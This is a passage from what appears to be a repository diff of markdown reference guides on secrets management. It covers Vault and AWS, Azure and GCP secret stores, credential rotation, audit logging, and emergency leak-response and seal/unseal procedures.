bound_service_account_names=api-server \
bound_service_account_namespaces=production \
policies=api-server-secrets \
ttl=1h
```
**OIDC** — Human operator access via SSO provider (Okta, Azure AD, Google Workspace).
```hcl
vault write auth/oidc/role/engineering \
bound_audiences="vault" \
allowed_redirect_uris="https://vault.example.com/ui/vault/auth/oidc/oidc/callback" \
user_claim="email" \
oidc_scopes="openid,profile,email" \
policies="engineering-read" \
ttl=8h
```
### Secret Engines
| Engine | Use Case | TTL Strategy |
|--------|----------|-------------|
| KV v2 | Static secrets (API keys, config) | Versioned, manual rotation |
| Database | Dynamic DB credentials | 1h default, 24h max |
| PKI | TLS certificates | 90d leaf certs, 5y intermediate CA |
| Transit | Encryption-as-a-service | Key rotation every 90d |
| SSH | Signed SSH certificates | 30m for interactive, 8h for automation |
### Policy Design
Follow least-privilege with path-based granularity:
```hcl
# payment-service-read policy
path "secret/data/production/payment/*" {
capabilities = ["read"]
}
path "database/creds/payment-readonly" {
capabilities = ["read"]
}
# Deny access to admin paths explicitly
path "sys/*" {
capabilities = ["deny"]
}
```
**Policy naming convention:** `{service}-{access-level}` (e.g., `payment-service-read`, `api-gateway-admin`).
---
## Cloud Secret Store Integration
### Comparison Matrix
| Feature | AWS Secrets Manager | Azure Key Vault | GCP Secret Manager |
|---------|--------------------|-----------------|--------------------|
| Rotation | Built-in Lambda | Custom logic via Functions | Cloud Functions |
| Versioning | Automatic | Manual or automatic | Automatic |
| Encryption | AWS KMS (default or CMK) | HSM-backed | Google-managed or CMEK |
| Access control | IAM policies + resource policy | RBAC + Access Policies | IAM bindings |
| Cross-region | Replication supported | Geo-redundant by default | Replication supported |
| Audit | CloudTrail | Azure Monitor + Diagnostic Logs | Cloud Audit Logs |
| Pricing model | Per-secret + per-API call | Per-operation + per-key | Per-secret version + per-access |
### When to Use Which
- **AWS Secrets Manager**: RDS/Aurora credential rotation out of the box. Best when fully on AWS.
- **Azure Key Vault**: Certificate management strength. Required for Azure AD integrated workloads.
- **GCP Secret Manager**: Simplest API surface. Best for GKE-native workloads with Workload Identity.
- **HashiCorp Vault**: Multi-cloud, dynamic secrets, PKI, transit encryption. Best for complex or hybrid environments.
### SDK Access Patterns
**Principle:** Always fetch secrets at startup or via sidecar — never bake into images or config files.
```python
# AWS Secrets Manager pattern
import boto3, json
def get_secret(secret_name, region="us-east-1"):
    """Fetch a secret from AWS Secrets Manager and decode its JSON payload."""
    sm_client = boto3.client("secretsmanager", region_name=region)
    raw = sm_client.get_secret_value(SecretId=secret_name)["SecretString"]
    return json.loads(raw)
```
```python
# GCP Secret Manager pattern
from google.cloud import secretmanager
def get_secret(project_id, secret_id, version="latest"):
    """Return the UTF-8 payload of one GCP Secret Manager secret version."""
    sm = secretmanager.SecretManagerServiceClient()
    resource = f"projects/{project_id}/secrets/{secret_id}/versions/{version}"
    reply = sm.access_secret_version(request={"name": resource})
    return reply.payload.data.decode("UTF-8")
```
```python
# Azure Key Vault pattern
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient
def get_secret(vault_url, secret_name):
    """Read a secret value from Azure Key Vault using the default credential chain."""
    cred = DefaultAzureCredential()
    kv = SecretClient(vault_url=vault_url, credential=cred)
    return kv.get_secret(secret_name).value
```
---
## Secret Rotation Workflows
### Rotation Strategy by Secret Type
| Secret Type | Rotation Frequency | Method | Downtime Risk |
|-------------|-------------------|--------|---------------|
| Database passwords | 30 days | Dual-account swap | Zero (A/B rotation) |
| API keys | 90 days | Generate new, deprecate old | Zero (overlap window) |
| TLS certificates | 60 days before expiry | ACME or Vault PKI | Zero (graceful reload) |
| SSH keys | 90 days | Vault-signed certificates | Zero (CA-based) |
| Service tokens | 24 hours | Dynamic generation | Zero (short-lived) |
| Encryption keys | 90 days | Key versioning (rewrap) | Zero (version coexistence) |
### Database Credential Rotation (Dual-Account)
1. Two database accounts exist: `app_user_a` and `app_user_b`
2. Application currently uses `app_user_a`
3. Rotation rotates `app_user_b` password, updates secret store
4. Application switches to `app_user_b` on next credential fetch
5. After grace period, `app_user_a` password is rotated
6. Cycle repeats
### API Key Rotation (Overlap Window)
1. Generate new API key with provider
2. Store new key in secret store as `current`, move old to `previous`
3. Deploy applications — they read `current`
4. After all instances restarted (or TTL expired), revoke `previous`
5. Monitoring confirms zero usage of old key before revocation
---
## Dynamic Secrets
Dynamic secrets are generated on-demand with automatic expiration. Prefer dynamic secrets over static credentials wherever possible.
### Database Dynamic Credentials (Vault)
```hcl
# Configure database engine
vault write database/config/postgres \
plugin_name=postgresql-database-plugin \
connection_url="postgresql://{{username}}:{{password}}@db.example.com:5432/app" \
allowed_roles="app-readonly,app-readwrite" \
username="vault_admin" \
password="<admin-password>"
# Create role with TTL
vault write database/roles/app-readonly \
db_name=postgres \
creation_statements="CREATE ROLE \"{{name}}\" WITH LOGIN PASSWORD '{{password}}' VALID UNTIL '{{expiration}}'; GRANT SELECT ON ALL TABLES IN SCHEMA public TO \"{{name}}\";" \
default_ttl=1h \
max_ttl=24h
```
### Cloud IAM Dynamic Credentials
Vault can generate short-lived AWS IAM credentials, Azure service principal passwords, or GCP service account keys — eliminating long-lived cloud credentials entirely.
### SSH Certificate Authority
Replace SSH key distribution with a Vault-signed certificate model:
1. Vault acts as SSH CA
2. Users/machines request signed certificates with short TTL (30 min)
3. SSH servers trust the CA public key — no `authorized_keys` management
4. Certificates expire automatically — no revocation needed for normal operations
---
## Audit Logging
### What to Log
| Event | Priority | Retention |
|-------|----------|-----------|
| Secret read access | HIGH | 1 year minimum |
| Secret creation/update | HIGH | 1 year minimum |
| Auth method login | MEDIUM | 90 days |
| Policy changes | CRITICAL | 2 years (compliance) |
| Failed access attempts | CRITICAL | 1 year |
| Token creation/revocation | MEDIUM | 90 days |
| Seal/unseal operations | CRITICAL | Indefinite |
### Anomaly Detection Signals
- Secret accessed from new IP/CIDR range
- Access volume spike (>3x baseline for a path)
- Off-hours access for human auth methods
- Service accessing secrets outside its policy scope (denied requests)
- Multiple failed auth attempts from single source
- Token created with unusually long TTL
### Compliance Reporting
Generate periodic reports covering:
1. **Access inventory** — Which identities accessed which secrets, when
2. **Rotation compliance** — Secrets overdue for rotation
3. **Policy drift** — Policies modified since last review
4. **Orphaned secrets** — Secrets with no recent access (>90 days)
Use `audit_log_analyzer.py` to parse Vault or cloud audit logs for these signals.
---
## Emergency Procedures
### Secret Leak Response (Immediate)
**Time target: Contain within 15 minutes of detection.**
1. **Identify scope** — Which secret(s) leaked, where (repo, log, error message, third party)
2. **Revoke immediately** — Rotate the compromised credential at the source (provider API, Vault, cloud SM)
3. **Invalidate tokens** — Revoke all Vault tokens that accessed the leaked secret
4. **Audit blast radius** — Query audit logs for usage of the compromised secret in the exposure window
5. **Notify stakeholders** — Security team, affected service owners, compliance (if PII/regulated data)
6. **Post-mortem** — Document root cause, update controls to prevent recurrence
### Vault Seal Operations
**When to seal:** Active security incident affecting Vault infrastructure, suspected key compromise.
**Sealing** stops all Vault operations. Use only as last resort.
**Unseal procedure:**
1. Gather quorum of unseal key holders (Shamir threshold)
2. Or confirm auto-unseal KMS key is accessible
3. Unseal via `vault operator unseal` or restart with auto-unseal
4. Verify audit devices reconnected
5. Check active leases and token validity
See `references/emergency_procedures.md` for complete playbooks.
---
## CI/CD Integration
### Vault Agent Sidecar (Kubernetes)
Vault Agent runs alongside application pods, handles authentication and secret rendering:
```yaml
# Pod annotation for Vault Agent Injector
annotations:
vault.hashicorp.com/agent-inject: "true"
vault.hashicorp.com/role: "api-server"
vault.hashicorp.com/agent-inject-secret-db: "database/creds/app-readonly"
vault.hashicorp.com/agent-inject-template-db: |
{{- with secret "database/creds/app-readonly" -}}
postgresql://{{ .Data.username }}:{{ .Data.password }}@db:5432/app
{{- end }}
```
### External Secrets Operator (Kubernetes)
For teams preferring declarative GitOps over agent sidecars:
```yaml
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
name: api-credentials
spec:
refreshInterval: 1h
secretStoreRef:
name: vault-backend
kind: ClusterSecretStore
target:
name: api-credentials
data:
- secretKey: api-key
remoteRef:
key: secret/data/production/api
property: key
```
### GitHub Actions OIDC
Eliminate long-lived secrets in CI by using OIDC federation:
```yaml
- name: Authenticate to Vault
uses: hashicorp/vault-action@v2
with:
url: https://vault.example.com
method: jwt
role: github-ci
jwtGithubAudience: https://vault.example.com
secrets: |
secret/data/ci/deploy api_key | DEPLOY_API_KEY ;
secret/data/ci/deploy db_password | DB_PASSWORD
```
---
## Anti-Patterns
| Anti-Pattern | Risk | Correct Approach |
|-------------|------|-----------------|
| Hardcoded secrets in source code | Leak via repo, logs, error output | Fetch from secret store at runtime |
| Long-lived static tokens (>30 days) | Stale credentials, no accountability | Dynamic secrets or short TTL + rotation |
| Shared service accounts | No audit trail per consumer | Per-service identity with unique credentials |
| No rotation policy | Compromised creds persist indefinitely | Automated rotation on schedule |
| Secrets in environment variables on CI | Visible in build logs, process table | Vault Agent or OIDC-based injection |
| Single unseal key holder | Bus factor of 1, recovery blocked | Shamir split (3-of-5) or auto-unseal |
| No audit device configured | Zero visibility into access | Dual audit devices (file + syslog) |
| Wildcard policies (`path "*"`) | Over-permissioned, violates least privilege | Explicit path-based policies per service |
---
## Tools
| Script | Purpose |
|--------|---------|
| `vault_config_generator.py` | Generate Vault policy and auth config from application requirements |
| `rotation_planner.py` | Create rotation schedule from a secret inventory file |
| `audit_log_analyzer.py` | Analyze audit logs for anomalies and compliance gaps |
---
## Cross-References
- **env-secrets-manager** — Local `.env` file hygiene, leak detection, drift awareness
- **senior-secops** — Security operations, incident response, threat modeling
- **ci-cd-pipeline-builder** — Pipeline design where secrets are consumed
- **docker-development** — Container secret injection patterns
- **helm-chart-builder** — Kubernetes secret management in Helm charts

View File

@@ -0,0 +1,354 @@
# Cloud Secret Store Reference
## Provider Comparison
### Feature Matrix
| Feature | AWS Secrets Manager | Azure Key Vault | GCP Secret Manager |
|---------|--------------------|-----------------|--------------------|
| **Secret types** | String, binary | Secrets, keys, certificates | String, binary |
| **Max secret size** | 64 KB | 25 KB (secret), 200 KB (cert) | 64 KB |
| **Versioning** | Automatic (all versions) | Manual enable per secret | Automatic |
| **Rotation** | Built-in Lambda rotation | Custom via Functions/Logic Apps | Custom via Cloud Functions |
| **Encryption** | AWS KMS (default or CMK) | HSM-backed (FIPS 140-2 L2) | Google-managed or CMEK |
| **Cross-region** | Replication to multiple regions | Geo-redundant by SKU | Replication supported |
| **Access control** | IAM + resource-based policies | RBAC + access policies | IAM bindings |
| **Audit** | CloudTrail | Azure Monitor + Diagnostics | Cloud Audit Logs |
| **Secret references** | ARN | Vault URI + secret name | Resource name |
| **Cost model** | $0.40/secret/mo + $0.05/10K calls | $0.03/10K ops (Standard) | $0.06/10K access ops |
| **Free tier** | No | No | 6 active versions free |
### Decision Guide
**Choose AWS Secrets Manager when:**
- Fully on AWS
- Need native RDS/Aurora/Redshift rotation
- Using ECS/EKS with native AWS IAM integration
- Cross-account secret sharing via resource policies
**Choose Azure Key Vault when:**
- Azure-primary workloads
- Certificate lifecycle management is critical (built-in CA integration)
- Need HSM-backed key protection (Premium SKU)
- Azure AD conditional access integration required
**Choose GCP Secret Manager when:**
- GCP-primary workloads
- Using GKE with Workload Identity
- Want simplest API surface (few concepts, fast to integrate)
- Cost-sensitive (generous free tier)
**Choose HashiCorp Vault when:**
- Multi-cloud or hybrid environments
- Dynamic secrets (database, cloud IAM, SSH) are primary use case
- Need transit encryption, PKI, or SSH CA
- Regulatory requirement for self-hosted secret management
## AWS Secrets Manager
### Access Patterns
```python
import boto3
import json
from botocore.exceptions import ClientError
def get_secret(secret_name, region="us-east-1"):
    """Retrieve secret from AWS Secrets Manager.

    Returns the JSON-decoded string payload, or raw bytes for binary-only
    secrets. Raises ValueError when the secret does not exist and
    RuntimeError when KMS cannot decrypt it; any other client error
    propagates unchanged.
    """
    sm = boto3.client("secretsmanager", region_name=region)
    try:
        result = sm.get_secret_value(SecretId=secret_name)
    except ClientError as err:
        error_code = err.response["Error"]["Code"]
        if error_code == "ResourceNotFoundException":
            raise ValueError(f"Secret {secret_name} not found")
        if error_code == "DecryptionFailureException":
            raise RuntimeError("KMS decryption failed — check key permissions")
        raise
    string_payload = result.get("SecretString")
    if string_payload is not None:
        return json.loads(string_payload)
    return result["SecretBinary"]
```
### Rotation with Lambda
```python
# rotation_lambda.py — skeleton for custom rotation
import json

import boto3


def lambda_handler(event, context):
    """AWS Secrets Manager rotation entry point.

    Secrets Manager invokes this Lambda once per rotation step
    (createSecret → setSecret → testSecret → finishSecret). Each call
    carries the secret identifier, the step name, and a client request
    token that tags the in-flight AWSPENDING version. The helper
    functions (generate_password, get_secret_version, apply_credentials,
    test_connection, get_current_version) are application-specific and
    must be supplied by the implementer.
    """
    secret_id = event["SecretId"]
    step = event["Step"]
    token = event["ClientRequestToken"]
    client = boto3.client("secretsmanager")
    if step == "createSecret":
        # Generate new credentials and stage them as AWSPENDING
        new_password = generate_password()
        client.put_secret_value(
            SecretId=secret_id,
            ClientRequestToken=token,
            SecretString=json.dumps({"password": new_password}),
            VersionStages=["AWSPENDING"],
        )
    elif step == "setSecret":
        # Apply new credentials to the target service
        pending = get_secret_version(client, secret_id, "AWSPENDING", token)
        apply_credentials(pending)
    elif step == "testSecret":
        # Verify new credentials work before promotion
        pending = get_secret_version(client, secret_id, "AWSPENDING", token)
        test_connection(pending)
    elif step == "finishSecret":
        # Promote AWSPENDING to AWSCURRENT (stage move is atomic)
        client.update_secret_version_stage(
            SecretId=secret_id,
            VersionStage="AWSCURRENT",
            MoveToVersionId=token,
            RemoveFromVersionId=get_current_version(client, secret_id),
        )
```
### IAM Policy for Secret Access
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": ["secretsmanager:GetSecretValue"],
"Resource": "arn:aws:secretsmanager:us-east-1:123456789012:secret:production/api/*",
"Condition": {
"StringEquals": {
"aws:RequestedRegion": "us-east-1"
}
}
}
]
}
```
### Cross-Account Access
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {"AWS": "arn:aws:iam::987654321098:role/shared-secret-reader"},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*",
"Condition": {
"ForAnyValue:StringEquals": {
"secretsmanager:VersionStage": "AWSCURRENT"
}
}
}
]
}
```
## Azure Key Vault
### Access Patterns
```python
from azure.identity import DefaultAzureCredential, ManagedIdentityCredential
from azure.keyvault.secrets import SecretClient
def get_secret(vault_url, secret_name, use_managed_identity=True):
    """Retrieve secret from Azure Key Vault.

    Uses a managed identity by default; set use_managed_identity=False
    to fall back to the full DefaultAzureCredential chain (env vars,
    CLI login, etc.).
    """
    cred = ManagedIdentityCredential() if use_managed_identity else DefaultAzureCredential()
    kv = SecretClient(vault_url=vault_url, credential=cred)
    return kv.get_secret(secret_name).value
def list_secrets(vault_url):
    """Return the names (never the values) of every secret in the vault."""
    kv = SecretClient(vault_url=vault_url, credential=DefaultAzureCredential())
    return [props.name for props in kv.list_properties_of_secrets()]
```
### RBAC vs Access Policies
**RBAC (recommended):**
- Uses Azure AD roles (`Key Vault Secrets User`, `Key Vault Secrets Officer`)
- Managed at subscription/resource group/vault level
- Audit via Azure AD activity logs
**Access Policies (legacy):**
- Per-vault configuration
- Object ID based
- No inheritance from resource group
```bash
# Assign RBAC role
az role assignment create \
--role "Key Vault Secrets User" \
--assignee <service-principal-id> \
--scope /subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.KeyVault/vaults/<vault>
```
### Certificate Management
Azure Key Vault has first-class certificate management with automatic renewal:
```bash
# Create certificate with auto-renewal
az keyvault certificate create \
--vault-name my-vault \
--name api-tls \
--policy @cert-policy.json
# cert-policy.json
{
"issuerParameters": {"name": "Self"},
"keyProperties": {"keyType": "RSA", "keySize": 2048},
"lifetimeActions": [
{"action": {"actionType": "AutoRenew"}, "trigger": {"daysBeforeExpiry": 30}}
],
"x509CertificateProperties": {
"subject": "CN=api.example.com",
"validityInMonths": 12
}
}
```
## GCP Secret Manager
### Access Patterns
```python
from google.cloud import secretmanager
def get_secret(project_id, secret_id, version="latest"):
    """Retrieve secret from GCP Secret Manager."""
    sm = secretmanager.SecretManagerServiceClient()
    resource = f"projects/{project_id}/secrets/{secret_id}/versions/{version}"
    reply = sm.access_secret_version(request={"name": resource})
    return reply.payload.data.decode("UTF-8")
def create_secret(project_id, secret_id, secret_value):
    """Create a new secret with initial version.

    Creates the secret container with automatic replication, then
    attaches secret_value as its first version. Returns the secret's
    full resource name.
    """
    sm = secretmanager.SecretManagerServiceClient()
    # Create the secret resource (the container that holds versions)
    container = sm.create_secret(
        request={
            "parent": f"projects/{project_id}",
            "secret_id": secret_id,
            "secret": {"replication": {"automatic": {}}},
        }
    )
    # Attach the initial version carrying the actual value
    sm.add_secret_version(
        request={
            "parent": container.name,
            "payload": {"data": secret_value.encode("UTF-8")},
        }
    )
    return container.name
```
### Workload Identity for GKE
Eliminate service account key files by binding Kubernetes service accounts to GCP IAM:
```bash
# Create IAM binding
gcloud iam service-accounts add-iam-policy-binding \
secret-accessor@my-project.iam.gserviceaccount.com \
--role roles/iam.workloadIdentityUser \
--member "serviceAccount:my-project.svc.id.goog[namespace/ksa-name]"
# Annotate Kubernetes service account
kubectl annotate serviceaccount ksa-name \
--namespace namespace \
iam.gke.io/gcp-service-account=secret-accessor@my-project.iam.gserviceaccount.com
```
### IAM Policy
```bash
# Grant secret accessor role to a service account
gcloud secrets add-iam-policy-binding my-secret \
--member="serviceAccount:my-app@my-project.iam.gserviceaccount.com" \
--role="roles/secretmanager.secretAccessor"
```
## Cross-Cloud Patterns
### Abstraction Layer
When operating multi-cloud, create a thin abstraction that normalizes secret access:
```python
# secret_client.py — cross-cloud abstraction
class SecretClient:
    """Thin cross-cloud facade that normalizes secret access.

    Delegates every call to a provider-specific backend client chosen
    at construction time; backends are instantiated lazily so only the
    selected provider's class needs to be importable.
    """

    def __init__(self, provider, **kwargs):
        # Lambdas defer backend construction until the provider is validated
        factories = {
            "aws": lambda: AWSSecretClient(**kwargs),
            "azure": lambda: AzureSecretClient(**kwargs),
            "gcp": lambda: GCPSecretClient(**kwargs),
            "vault": lambda: VaultSecretClient(**kwargs),
        }
        if provider not in factories:
            raise ValueError(f"Unknown provider: {provider}")
        self._client = factories[provider]()

    def get(self, key):
        """Read the secret stored under *key* from the backend."""
        return self._client.get(key)

    def set(self, key, value):
        """Write *value* under *key* and return the backend's response."""
        return self._client.set(key, value)
```
### Migration Strategy
When migrating between providers:
1. **Dual-write phase** — Write to both old and new store simultaneously
2. **Dual-read phase** — Read from new store, fallback to old
3. **Cut-over** — Read exclusively from new store
4. **Cleanup** — Remove secrets from old store after grace period
### Secret Synchronization
For hybrid setups (e.g., Vault as primary, cloud SM for specific workloads):
- Use Vault's cloud secret engines to generate cloud-native credentials dynamically
- Or use External Secrets Operator to sync from Vault into cloud-native stores
- Never manually copy secrets between stores — always automate
## Caching and Performance
### Client-Side Caching
All three cloud providers support caching SDKs:
- **AWS:** `aws-secretsmanager-caching-python` — caches with configurable TTL
- **Azure:** Built-in HTTP caching in SDK, or use Azure App Configuration
- **GCP:** No official caching library — implement in-process cache with TTL
### Caching Rules
1. Cache TTL should be shorter than rotation period (e.g., cache 5 min if rotating every 30 days)
2. Implement cache invalidation on secret version change events
3. Never cache secrets to disk — in-memory only
4. Log cache hits/misses for debugging rotation issues
## Compliance Mapping
| Requirement | AWS SM | Azure KV | GCP SM | Vault |
|------------|--------|----------|--------|-------|
| SOC 2 audit trail | CloudTrail | Monitor logs | Audit Logs | Audit device |
| HIPAA encryption | KMS (BAA) | HSM (BAA) | CMEK (BAA) | Auto-encrypt |
| PCI DSS key mgmt | KMS compliance | Premium HSM | CMEK | Transit engine |
| GDPR data residency | Region selection | Region selection | Region selection | Self-hosted |
| ISO 27001 | Certified | Certified | Certified | Self-certify |

View File

@@ -0,0 +1,280 @@
# Emergency Procedures Reference
## Secret Leak Response Playbook
### Severity Classification
| Severity | Definition | Response Time | Example |
|----------|-----------|---------------|---------|
| **P0 — Critical** | Production credentials exposed publicly | Immediate (15 min) | Database password in public GitHub repo |
| **P1 — High** | Internal credentials exposed beyond intended scope | 1 hour | API key in build logs accessible to wider org |
| **P2 — Medium** | Non-production credentials exposed | 4 hours | Staging DB password in internal wiki |
| **P3 — Low** | Expired or limited-scope credential exposed | 24 hours | Rotated API key found in old commit history |
### P0/P1 Response Procedure
**Phase 1: Contain (0-15 minutes)**
1. **Identify the leaked secret**
- What credential was exposed? (type, scope, permissions)
- Where was it exposed? (repo, log, error page, third-party service)
- When was it first exposed? (commit timestamp, log timestamp)
- Is the exposure still active? (repo public? log accessible?)
2. **Revoke immediately**
- Database password: `ALTER ROLE app_user WITH PASSWORD 'new_password';`
- API key: Regenerate via provider console/API
- Vault token: `vault token revoke <token>`
- AWS access key: `aws iam delete-access-key --access-key-id <key>`
- Cloud service account: Delete and recreate key
- TLS certificate: Revoke via CA, generate new certificate
3. **Remove exposure**
- Public repo: Remove file, force-push to remove from history, request GitHub cache purge
- Build logs: Delete log artifacts, rotate CI/CD secrets
- Error page: Deploy fix to suppress secret in error output
- Third-party: Contact vendor for log purge if applicable
4. **Deploy new credentials**
- Update secret store with rotated credential
- Restart affected services to pick up new credential
- Verify services are healthy with new credential
**Phase 2: Assess (15-60 minutes)**
5. **Audit blast radius**
- Query Vault/cloud SM audit logs for the compromised credential
- Check for unauthorized usage during the exposure window
- Review network logs for suspicious connections from unknown IPs
- Check if the compromised credential grants access to other secrets (privilege escalation)
6. **Notify stakeholders**
- Security team (always)
- Service owners for affected systems
- Compliance team if regulated data was potentially accessed
- Legal if customer data may have been compromised
- Executive leadership for P0 incidents
**Phase 3: Recover (1-24 hours)**
7. **Rotate adjacent credentials**
- If the leaked credential could access other secrets, rotate those too
- If a Vault token leaked, check what policies it had — rotate everything accessible
8. **Harden against recurrence**
- Add pre-commit hook to detect secrets (e.g., `gitleaks`, `detect-secrets`)
- Review CI/CD pipeline for secret masking
- Audit who has access to the source of the leak
**Phase 4: Post-Mortem (24-72 hours)**
9. **Document incident**
- Timeline of events
- Root cause analysis
- Impact assessment
- Remediation actions taken
- Preventive measures added
### Response Communication Template
```
SECURITY INCIDENT — SECRET EXPOSURE
Severity: P0/P1
Time detected: YYYY-MM-DD HH:MM UTC
Secret type: [database password / API key / token / certificate]
Exposure vector: [public repo / build log / error output / other]
Status: [CONTAINED / INVESTIGATING / RESOLVED]
Immediate actions taken:
- [ ] Credential revoked at source
- [ ] Exposure removed
- [ ] New credential deployed
- [ ] Services verified healthy
- [ ] Audit log review in progress
Blast radius assessment: [PENDING / COMPLETE — no unauthorized access / COMPLETE — unauthorized access detected]
Next update: [time]
Incident commander: [name]
```
## Vault Seal/Unseal Procedures
### Understanding Seal Status
Vault uses a **seal** mechanism to protect the encryption key hierarchy. When sealed, Vault cannot decrypt any data or serve any requests.
```
Sealed State:
Vault process running → YES
API responding → YES (503 Sealed)
Serving secrets → NO
All active leases → FROZEN (not revoked)
Audit logging → NO
Unsealed State:
Vault process running → YES
API responding → YES (200 OK)
Serving secrets → YES
Active leases → RESUMING
Audit logging → YES
```
### When to Seal Vault (Emergency Only)
Seal Vault when:
- Active intrusion on Vault infrastructure is confirmed
- Vault server compromise is suspected (unauthorized root access)
- Encryption key material may have been extracted
- Regulatory/legal hold requires immediate data access prevention
**Do NOT seal for:**
- Routine maintenance (use graceful shutdown instead)
- Single-node issues in HA cluster (let standby take over)
- Suspected secret leak (revoke the secret, don't seal Vault)
### Seal Procedure
```bash
# Seal a single node
vault operator seal
# Seal all nodes (HA cluster)
# Seal each node individually — leader last
vault operator seal -address=https://vault-standby-1:8200
vault operator seal -address=https://vault-standby-2:8200
vault operator seal -address=https://vault-leader:8200
```
**Impact of sealing:**
- All active client connections dropped immediately
- All token and lease timers paused
- Applications lose secret access — prepare for cascading failures
- Monitoring will fire alerts for sealed state
### Unseal Procedure (Shamir Keys)
Requires a quorum of key holders (e.g., 3 of 5).
```bash
# Each key holder provides their unseal key
vault operator unseal <key-1>
vault operator unseal <key-2>
vault operator unseal <key-3>
# Vault unseals after reaching threshold
```
**Operational checklist after unseal:**
1. Verify health: `vault status` shows `Sealed: false`
2. Check audit devices: `vault audit list` — confirm all enabled
3. Check auth methods: `vault auth list`
4. Verify HA status: `vault operator raft list-peers`
5. Check lease count: monitor `vault.expire.num_leases`
6. Verify applications reconnecting (check application logs)
### Unseal Procedure (Auto-Unseal)
If using cloud KMS auto-unseal, Vault unseals automatically on restart:
```bash
# Restart Vault service
systemctl restart vault
# Verify unseal (should happen within seconds)
vault status
```
**If auto-unseal fails:**
- Check cloud KMS key permissions (IAM role may have been modified)
- Check network connectivity to cloud KMS endpoint
- Check KMS key status (not disabled, not scheduled for deletion)
- Check Vault logs: `journalctl -u vault -f`
## Mass Credential Rotation Procedure
When a broad compromise requires rotating many credentials simultaneously.
### Pre-Rotation Checklist
- [ ] Identify all credentials in scope
- [ ] Map credential dependencies (which services use which credentials)
- [ ] Determine rotation order (databases before applications)
- [ ] Prepare rollback plan for each credential
- [ ] Notify all service owners
- [ ] Schedule maintenance window if zero-downtime not possible
- [ ] Stage new credentials in secret store (but don't activate yet)
### Rotation Order
1. **Infrastructure credentials** — Database root passwords, cloud IAM admin keys
2. **Service credentials** — Application database users, API keys
3. **Integration credentials** — Third-party API keys, webhook secrets
4. **Human credentials** — Force password reset, revoke SSO sessions
### Rollback Plan
For each credential, document:
- Previous value (store in sealed emergency envelope or HSM)
- How to revert (specific command or API call)
- Verification step (how to confirm old credential works)
- Maximum time to rollback (SLA)
## Vault Recovery Procedures
### Lost Unseal Keys
If unseal keys are lost and auto-unseal is not configured:
1. **If Vault is currently unsealed:** Enable auto-unseal immediately, then reseal/unseal with KMS
2. **If Vault is sealed:** Data is irrecoverable without keys. Restore from Raft snapshot backup
3. **Prevention:** Store unseal keys in separate, secure locations (HSMs, safety deposit boxes). Use auto-unseal for production.
### Raft Cluster Recovery
**Single node failure (cluster still has quorum):**
```bash
# Remove failed peer
vault operator raft remove-peer <failed-node-id>
# Add replacement node
# (new node joins via retry_join in config)
```
**Loss of quorum (majority of nodes failed):**
```bash
# On a surviving node with recent data
vault operator raft join -leader-ca-cert=@ca.crt https://surviving-node:8200
# If no node survives, restore from snapshot
vault operator raft snapshot restore /backups/latest.snap
```
### Root Token Recovery
If root token is lost (it should be revoked after initial setup):
```bash
# Generate new root token (requires unseal key quorum)
vault operator generate-root -init
# Each key holder provides their key
vault operator generate-root -nonce=<nonce> <unseal-key>
# After quorum, decode the encoded token
vault operator generate-root -decode=<encoded-token> -otp=<otp>
```
**Best practice:** Generate a root token only when needed, complete the task, then revoke it:
```bash
vault token revoke <root-token>
```
## Incident Severity Escalation Matrix
| Signal | Escalation |
|--------|-----------|
| Single secret exposed in internal log | P2 — Rotate secret, add log masking |
| Secret in public repository (no evidence of use) | P1 — Immediate rotation, history scrub |
| Secret in public repository (evidence of unauthorized use) | P0 — Full incident response, legal notification |
| Vault node compromised | P0 — Seal cluster, rotate all accessible secrets |
| Cloud KMS key compromised | P0 — Create new key, re-encrypt all secrets, rotate all credentials |
| Audit log gap detected | P1 — Investigate cause, assume worst case for gap period |
| Multiple failed auth attempts from unknown source | P2 — Block source, investigate, rotate targeted credentials |

View File

@@ -0,0 +1,342 @@
# HashiCorp Vault Architecture & Patterns Reference
## Architecture Overview
Vault operates as a centralized secret management service with a client-server model. All secrets are encrypted at rest and in transit. The seal/unseal mechanism protects the master encryption key.
### Core Components
```
┌─────────────────────────────────────────────────┐
│ Vault Cluster │
│ ┌───────────┐ ┌───────────┐ ┌───────────┐ │
│ │ Leader │ │ Standby │ │ Standby │ │
│ │ (active) │ │ (forward) │ │ (forward) │ │
│ └─────┬─────┘ └─────┬─────┘ └─────┬─────┘ │
│ │ │ │ │
│ ┌─────┴───────────────┴───────────────┴─────┐ │
│ │ Raft Storage Backend │ │
│ └───────────────────────────────────────────┘ │
│ │
│ ┌──────────┐ ┌──────────┐ ┌──────────────┐ │
│ │ Auth │ │ Secret │ │ Audit │ │
│ │ Methods │ │ Engines │ │ Devices │ │
│ └──────────┘ └──────────┘ └──────────────┘ │
└─────────────────────────────────────────────────┘
```
### Storage Backend Selection
| Backend | HA Support | Operational Complexity | Recommendation |
|---------|-----------|----------------------|----------------|
| Integrated Raft | Yes | Low | **Default choice** — no external dependencies |
| Consul | Yes | Medium | Legacy — use Raft unless already running Consul |
| S3/GCS/Azure Blob | No | Low | Dev/test only — no HA |
| PostgreSQL/MySQL | No | Medium | Not recommended — no HA, added dependency |
## High Availability Setup
### Raft Cluster Configuration
Minimum 3 nodes for production (tolerates 1 failure). 5 nodes for critical workloads (tolerates 2 failures).
```hcl
# vault-config.hcl (per node)
storage "raft" {
path = "/opt/vault/data"
node_id = "vault-1"
retry_join {
leader_api_addr = "https://vault-2.internal:8200"
}
retry_join {
leader_api_addr = "https://vault-3.internal:8200"
}
}
listener "tcp" {
address = "0.0.0.0:8200"
tls_cert_file = "/opt/vault/tls/vault.crt"
tls_key_file = "/opt/vault/tls/vault.key"
}
api_addr = "https://vault-1.internal:8200"
cluster_addr = "https://vault-1.internal:8201"
```
### Auto-Unseal with AWS KMS
Eliminates manual unseal key management. Vault encrypts its master key with the KMS key.
```hcl
seal "awskms" {
region = "us-east-1"
kms_key_id = "alias/vault-unseal"
}
```
**Requirements:**
- IAM role with `kms:Encrypt`, `kms:Decrypt`, `kms:DescribeKey` permissions
- KMS key must be in the same region or accessible cross-region
- KMS key should have restricted access — only Vault nodes
### Auto-Unseal with Azure Key Vault
```hcl
seal "azurekeyvault" {
